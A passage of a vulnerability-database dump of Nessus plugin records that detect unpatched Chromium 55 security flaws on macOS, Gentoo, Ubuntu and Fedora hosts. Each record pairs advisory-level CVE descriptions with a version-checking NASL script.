URLs. An\n unauthenticated, remote attacker can exploit this to\n cause a file to be downloaded without applying the\n mark-of-the-web. (CVE-2016-5214)\n\n - A use-after-free error exists in WebAudio within file\n content/renderer/media/renderer_webaudiodevice_impl.cc\n due to improper handling of web audio. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-5215)\n\n - A use-after-free error exists in PDFium, specifically\n within file pdf/pdfium/pdfium_engine.cc, due to improper\n handling of non-visible page unloading. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-5216)\n\n - A flaw exists in PDFium due to the use of unvalidated\n data by the PDF helper extension. An authenticated,\n remote attacker can exploit this to have an unspecified\n impact. No other details are available. (CVE-2016-5217)\n\n - A flaw exists when handling chrome.tabs API navigations\n and displaying the pending URL. An unauthenticated,\n remote attacker can exploit this to spoof the Omnibox\n address. (CVE-2016-5218)\n\n - An information disclosure vulnerability exists in\n PDFium, due to improper handling of 'file: navigation',\n that allows an unauthenticated, remote attacker to\n disclose local files. (CVE-2016-5220)\n\n - An integer overflow condition exists in ANGLE due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n have an unspecified impact. (CVE-2016-5221)\n\n - A flaw exists in the NavigatorImpl::NavigateToEntry()\n function within file frame_host/navigator_impl.cc due to\n improper handling of invalid URLs. An unauthenticated,\n remote attacker can exploit this to spoof the Omnibox\n address. (CVE-2016-5222)\n\n - An integer overflow condition exists in PDFium within\n file core/fpdfapi/page/cpdf_page.cpp that allows an\n authenticated, remote attacker to have an unspecified\n impact. No other details are available. (CVE-2016-5223)\n\n - A security bypass vulnerability exists in the SVG\n component due to denorm handling not being disabled\n before calling Skia filter code. An unauthenticated,\n remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-5224)\n\n - A flaw exists in Blink, specifically in the\n HTMLFormElement::scheduleFormSubmission() function\n within file html/HTMLFormElement.cpp, due to improper\n enforcement of the form-action CSP (Content Security\n Policy). An unauthenticated, remote attacker can exploit\n this to bypass intended access restrictions.\n (CVE-2016-5225)\n\n - A cross-site scripting (XSS) vulnerability exists in\n Blink within file ui/views/tabs/tab_strip.cc due to\n improper validation of input when dropping JavaScript\n URLs on a tab. An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5226)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to disclose Content\n Security Policy (CSP) referrers. (CVE-2016-9650)\n\n - An unspecified flaw exists in V8 within lookup.cc that\n allows unauthorized private property access. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-9651)\n\n - Multiple other vulnerabilities exist, the most serious\n of which can be exploited by an authenticated, remote\n attacker to execute arbitrary code. (CVE-2016-9652)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://googlechromereleases.blogspot.com/2016/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe6e9a5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 55.0.2883.75 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9652\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'55.0.2883.75', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-23T11:06:45", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201612-11\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201612-11.NASL", "href": "https://www.tenable.com/plugins/nessus/95526", "published": "2016-12-05T00:00:00", "title": "GLSA-201612-11 : Chromium: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201612-11.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95526);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"GLSA\", value:\"201612-11\");\n\n script_name(english:\"GLSA-201612-11 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201612-11\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201612-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-55.0.2883.75'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 55.0.2883.75\"), vulnerable:make_list(\"lt 55.0.2883.75\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-23T13:01:08", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to conduct cross-site scripting (XSS)\nattacks, read uninitialized memory, obtain sensitive information,\nspoof the webview URL, bypass same origin restrictions, cause a denial\nof service via application crash, or execute arbitrary code.\n(CVE-2016-5204, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208,\nCVE-2016-5209, CVE-2016-5212, CVE-2016-5215, CVE-2016-5222,\nCVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650,\nCVE-2016-9652)\n\nMultiple vulnerabilities were discovered in V8. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit these to obtain sensitive information, cause a\ndenial of service via application crash, or execute arbitrary code.\n(CVE-2016-5213, CVE-2016-5219, CVE-2016-9651)\n\nAn integer overflow was discovered in ANGLE. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via application crash, or\nexecute arbitrary code. (CVE-2016-5221).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3153-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95661", "published": "2016-12-09T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : oxide-qt vulnerabilities (USN-3153-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3153-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95661);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5215\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"USN\", value:\"3153-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 : oxide-qt vulnerabilities (USN-3153-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to conduct cross-site scripting (XSS)\nattacks, read uninitialized memory, obtain sensitive information,\nspoof the webview URL, bypass same origin restrictions, cause a denial\nof service via application crash, or execute arbitrary code.\n(CVE-2016-5204, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208,\nCVE-2016-5209, CVE-2016-5212, CVE-2016-5215, CVE-2016-5222,\nCVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650,\nCVE-2016-9652)\n\nMultiple vulnerabilities were discovered in V8. If a user were tricked\nin to opening a specially crafted website, an attacker could\npotentially exploit these to obtain sensitive information, cause a\ndenial of service via application crash, or execute arbitrary code.\n(CVE-2016-5213, CVE-2016-5219, CVE-2016-9651)\n\nAn integer overflow was discovered in ANGLE. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via application crash, or\nexecute arbitrary code. (CVE-2016-5221).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3153-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected liboxideqtcore0 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.19.4-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.19.4-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"liboxideqtcore0\", pkgver:\"1.19.4-0ubuntu0.16.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-23T10:44:12", "bulletinFamily": "scanner", "description": "Update to Chromium 55. \n\nSecurity fix for CVE-2016-5199, CVE-2016-5200, CVE-2016-5201,\nCVE-2016-5202, CVE-2016-9651, CVE-2016-5208, CVE-2016-5207,\nCVE-2016-5206, CVE-2016-5205, CVE-2016-5204, CVE-2016-5209,\nCVE-2016-5203, CVE-2016-5210, CVE-2016-5212, CVE-2016-5211,\nCVE-2016-5213, CVE-2016-5214, CVE-2016-5216, CVE-2016-5215,\nCVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221,\nCVE-2016-5220, CVE-2016-5222, CVE-2016-9650, CVE-2016-5223,\nCVE-2016-5226, CVE-2016-5225, CVE-2016-5224, CVE-2016-9652\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2016-A815B7BF5D.NASL", "href": "https://www.tenable.com/plugins/nessus/95903", "published": "2016-12-16T00:00:00", "title": "Fedora 25 : chromium (2016-a815b7bf5d)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-a815b7bf5d.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95903);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"FEDORA\", value:\"2016-a815b7bf5d\");\n\n script_name(english:\"Fedora 25 : chromium (2016-a815b7bf5d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Chromium 55. \n\nSecurity fix for CVE-2016-5199, CVE-2016-5200, CVE-2016-5201,\nCVE-2016-5202, CVE-2016-9651, CVE-2016-5208, CVE-2016-5207,\nCVE-2016-5206, CVE-2016-5205, CVE-2016-5204, CVE-2016-5209,\nCVE-2016-5203, CVE-2016-5210, CVE-2016-5212, CVE-2016-5211,\nCVE-2016-5213, CVE-2016-5214, CVE-2016-5216, CVE-2016-5215,\nCVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221,\nCVE-2016-5220, CVE-2016-5222, CVE-2016-9650, CVE-2016-5223,\nCVE-2016-5226, CVE-2016-5225, CVE-2016-5224, CVE-2016-9652\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-a815b7bf5d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"chromium-55.0.2883.87-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-23T10:44:16", "bulletinFamily": "scanner", "description": "Update to Chromium 55. \n\nSecurity fix for CVE-2016-5199, CVE-2016-5200, CVE-2016-5201,\nCVE-2016-5202, CVE-2016-9651, CVE-2016-5208, CVE-2016-5207,\nCVE-2016-5206, CVE-2016-5205, CVE-2016-5204, CVE-2016-5209,\nCVE-2016-5203, CVE-2016-5210, CVE-2016-5212, CVE-2016-5211,\nCVE-2016-5213, CVE-2016-5214, CVE-2016-5216, CVE-2016-5215,\nCVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221,\nCVE-2016-5220, CVE-2016-5222, CVE-2016-9650, CVE-2016-5223,\nCVE-2016-5226, CVE-2016-5225, CVE-2016-5224, CVE-2016-9652\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2016-E0E1CB2B2B.NASL", "href": "https://www.tenable.com/plugins/nessus/95906", "published": "2016-12-16T00:00:00", "title": "Fedora 24 : chromium (2016-e0e1cb2b2b)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-e0e1cb2b2b.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95906);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"FEDORA\", value:\"2016-e0e1cb2b2b\");\n\n script_name(english:\"Fedora 24 : chromium (2016-e0e1cb2b2b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Chromium 55. \n\nSecurity fix for CVE-2016-5199, CVE-2016-5200, CVE-2016-5201,\nCVE-2016-5202, CVE-2016-9651, CVE-2016-5208, CVE-2016-5207,\nCVE-2016-5206, CVE-2016-5205, CVE-2016-5204, CVE-2016-5209,\nCVE-2016-5203, CVE-2016-5210, CVE-2016-5212, CVE-2016-5211,\nCVE-2016-5213, CVE-2016-5214, CVE-2016-5216, CVE-2016-5215,\nCVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221,\nCVE-2016-5220, CVE-2016-5222, CVE-2016-9650, CVE-2016-5223,\nCVE-2016-5226, CVE-2016-5225, CVE-2016-5224, CVE-2016-9652\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-e0e1cb2b2b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 